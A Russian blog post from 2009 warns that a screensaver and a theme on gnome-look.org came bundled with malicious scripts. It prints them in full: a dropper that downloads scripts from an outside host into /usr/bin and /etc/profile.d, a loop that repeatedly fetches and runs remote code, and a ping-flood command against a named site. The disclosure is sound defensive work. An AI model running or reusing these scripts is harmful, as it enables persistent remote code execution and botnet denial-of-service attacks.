Блог им. Jolly_Roger → Не всё то золото, что блестит на gnome-look.org
За последние несколько дней, , обнаружено уже 2 пакета содержащие вредоносные скрипты: скринсейвер WaterFall и тема оформления Ninja (на данный момент контент изъят).
В комплекте с украшательствами шло:
Скрипт:
Содержание скрипта Auto.bash:
В конечном итоге выполнялась команда:
С помощью такого незамысловатого кода, вполне возможно, была попытка формирования ботнета.
Аккуратнее с незнакомым ПО! Обиднее всего, что скомпрометирован известный ресурс, которым сам пользуюсь время от времени.
В комплекте с украшательствами шло:
Скрипт:
1 #!/bin/sh
2 cd /usr/bin/
3 rm Auto.bash
4 sleep 1
5 wget http://05748.t35.com/Bots/Auto.bash
6 chmod 777 Auto.bash
7 echo -----------------
8 cd /etc/profile.d/
9 rm gnome.sh
10 sleep 1
11 wget http://05748.t35.com/Bots/gnome.sh
12 chmod 777 gnome.sh
13 echo -----------------
14 clear
15 exitСодержание скрипта Auto.bash:
1 while :
2 do
3 rm /usr/bin/run.bash
4 cd /usr/bin/
5 wget http://05748.t35.com/Bots/index.php
6 wget http://05748.t35.com/Bots/run.bash
7 sleep 4
8 rm index.php
9 chmod 755 run.bash
10 command -p /usr/bin/run.bash
11 doneВ конечном итоге выполнялась команда:
ping -s 65507 www.mmowned.comС помощью такого незамысловатого кода, вполне возможно, была попытка формирования ботнета.
Аккуратнее с незнакомым ПО! Обиднее всего, что скомпрометирован известный ресурс, которым сам пользуюсь время от времени.
- +7
- Jolly_Roger
- 10 декабря 2009, 15:02
Команда хорошая, для тех кто в курсе, что у него троян.
на хабре
пост написан раньше вас на две минуты :)
«И радует и в сердце тревога». Не знаю кто сказал — наверно я ).
Полносью согласен.